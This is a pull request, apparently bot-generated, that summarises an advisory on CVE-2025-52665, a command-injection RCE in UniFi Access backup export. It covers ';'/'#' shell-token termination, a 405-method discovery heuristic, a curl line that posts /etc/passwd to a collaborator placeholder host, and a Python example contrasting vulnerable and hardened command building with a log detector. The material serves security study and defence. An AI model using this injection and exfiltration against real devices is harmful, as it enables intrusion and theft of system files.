@carlospolop (Collaborator)

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

  • Blog URL: https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000
  • Blog Title: CVE-2025-52665: Unauthenticated RCE in UniFi Access backup/export via dir command injection
  • Suggested Section: Pentesting Web > OS Command Injection (add techniques for terminating/commenting shell pipelines with ';' and '#', and notes on reverse proxy/internal API exposure with 405-method mismatch heuristics)

🎯 Content Summary

Vulnerability: CVE-2025-52665 — unauthenticated remote command execution in UniFi Access (within UniFi OS/UDM SE) caused by an externally exposed reverse proxy on :9780 that forwards to an internal-only backup export API. The API's export routine builds shell commands using attacker-controlled input (dir) without validation/escaping, enabling command injection.

Architecture and code path: The backup workflow uses a higher-level orchestrator ...

🔧 Technical Details

Internal-only route exposure via external proxy: Probe device ports for known internal paths (e.g., /api/ucore/backup/export). A 405 Method Not Allowed on GET suggests the route exists externally and expects another method (here, POST) with a specific JSON body.

Shell injection in orchestrated backups: When an orchestrator forwards an unvalidated path (e.g., dir) to a shell-based export routine, inject shell metacharacters. Use ; to terminate your command and # to comment out the exporter’s trailing tokens (e.g., mktemp/chmod/tar/du) to prevent syntax errors.

Blind RCE confirmation with OOB: For blind execution, exfiltrate a local file (e.g., /etc/passwd) to an OOB endpoint (curl -s --data-binary @/etc/passwd http://<collaborator>/) to verify code execution before attempting a reverse shell.

Schema-assisted ...

🤖 Agent Actions

I analyzed the blog and determined it provides concrete, reusable techniques for OS Command Injection and discovery heuristics behind reverse-proxied internal APIs. This fits best in Pentesting Web > Command Injection.

What I added

  • A new subsection in src/pentesting-web/command-injection.md:

    • Terminate and comment out trailing shell tokens (avoid exporter pipelines): explains why a naive ; injection can fail when the application appends extra tokens (mktemp/chmod/tar/du, etc.), and shows the robust pattern ; ; # to end the attacker’s command and comment out the rest.
    • Practical JSON payload shape demonstrating the technique.
    • Blind RCE confirmation via HTTP OOB with curl --data-binary @/etc/passwd to a collaborator endpoint.
    • Discovery heuristic behind reverse proxies: using 405 Method Not Allowed on GET as a strong signal the route exists and expects a different verb (e.g., POST with JSON) to reach the vulnerable handler.
  • Reference added:

    • Link to the Catchify blog (CVE-2025-52665) in the References section.

Why this location

  • The techniques extend the OS Command Injection page with precise shell pipeline termination/commenting tactics and reverse-proxy method-mismatch heuristics that are broadly applicable beyond UniFi Access.

No other files were changed or created.


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

📚 Repository Maintenance

  • MD files processed: 907
  • MD files fixed: 1

All .md files have been checked for proper formatting (headers, includes, etc.).
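The defect the summary describes (an untrusted `dir` value pasted into a shell string, so that `;` and `#` decide where the command ends) beside a hardened version, plus a check over constructed request-log lines for that route. This is an added example, not code from the blog post, the PR, or UniFi; the export root, the command layout and the JSON log format are assumptions.

```python
"""Vulnerable vs. hardened handling of an export-directory parameter, plus a log check."""
import json
import re
from pathlib import Path

# Assumed export root; the real product's directory layout is not stated in the advisory.
EXPORT_ROOT = Path("/data/backups")
# Characters that let a value alter shell parsing (terminate, chain, comment, substitute).
SHELL_META = re.compile(r"[;&|`$#<>\n(){}]")


def build_export_command_vulnerable(export_dir: str) -> str:
    # The untrusted value is interpolated into one shell string; the shell, not this code,
    # decides where each command ends, so ';' and '#' inside export_dir change what runs.
    return f"mkdir -p {export_dir} && tar -czf {export_dir}/backup.tgz /data/config && du -sh {export_dir}"


def validate_export_dir(export_dir: str) -> Path:
    # Allow only a single plain path component: no separators, no metacharacters, no '.'/'..'.
    if not re.fullmatch(r"[A-Za-z0-9_.-]+", export_dir) or export_dir in (".", ".."):
        raise ValueError(f"rejected export dir: {export_dir!r}")
    return EXPORT_ROOT / export_dir


def build_export_command_hardened(export_dir: str) -> list[str]:
    # argv list for subprocess.run(argv, shell=False): no shell ever parses the value.
    target = validate_export_dir(export_dir)
    return ["tar", "-czf", str(target / "backup.tgz"), "/data/config"]


def flag_suspicious_export_requests(log_lines: list[str]) -> list[str]:
    # Return the 'dir' values of POST bodies to the export route that carry shell metacharacters.
    flagged = []
    for line in log_lines:
        entry = json.loads(line)
        if entry.get("method") != "POST" or entry.get("path") != "/api/ucore/backup/export":
            continue
        export_dir = entry.get("body", {}).get("dir", "")
        if SHELL_META.search(export_dir):
            flagged.append(export_dir)
    return flagged


# Constructed sample log lines (hypothetical format, not real UniFi logs).
SAMPLE_LOG = [
    json.dumps({"method": "GET", "path": "/api/ucore/backup/export", "status": 405}),
    json.dumps({"method": "POST", "path": "/api/ucore/backup/export", "body": {"dir": "nightly-2025"}}),
    json.dumps({"method": "POST", "path": "/api/ucore/backup/export", "body": {"dir": "x; id ; #"}}),
]

if __name__ == "__main__":
    print(build_export_command_vulnerable("x; id ; #"))
    print(build_export_command_hardened("nightly-2025"))
    print(flag_suspicious_export_requests(SAMPLE_LOG))
```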

@carlospolop (Collaborator, Author)

🔗 Additional Context

Original Blog Post: https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000

Content Categories: Based on the analysis, this content was categorized under "Pentesting Web > OS Command Injection (add techniques for terminating/commenting shell pipelines with ';' and '#', and notes on reverse proxy/internal API exposure with 405-method mismatch heuristics)".

Repository Maintenance:

  • MD Files Formatting: 907 files processed (1 file fixed)

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0
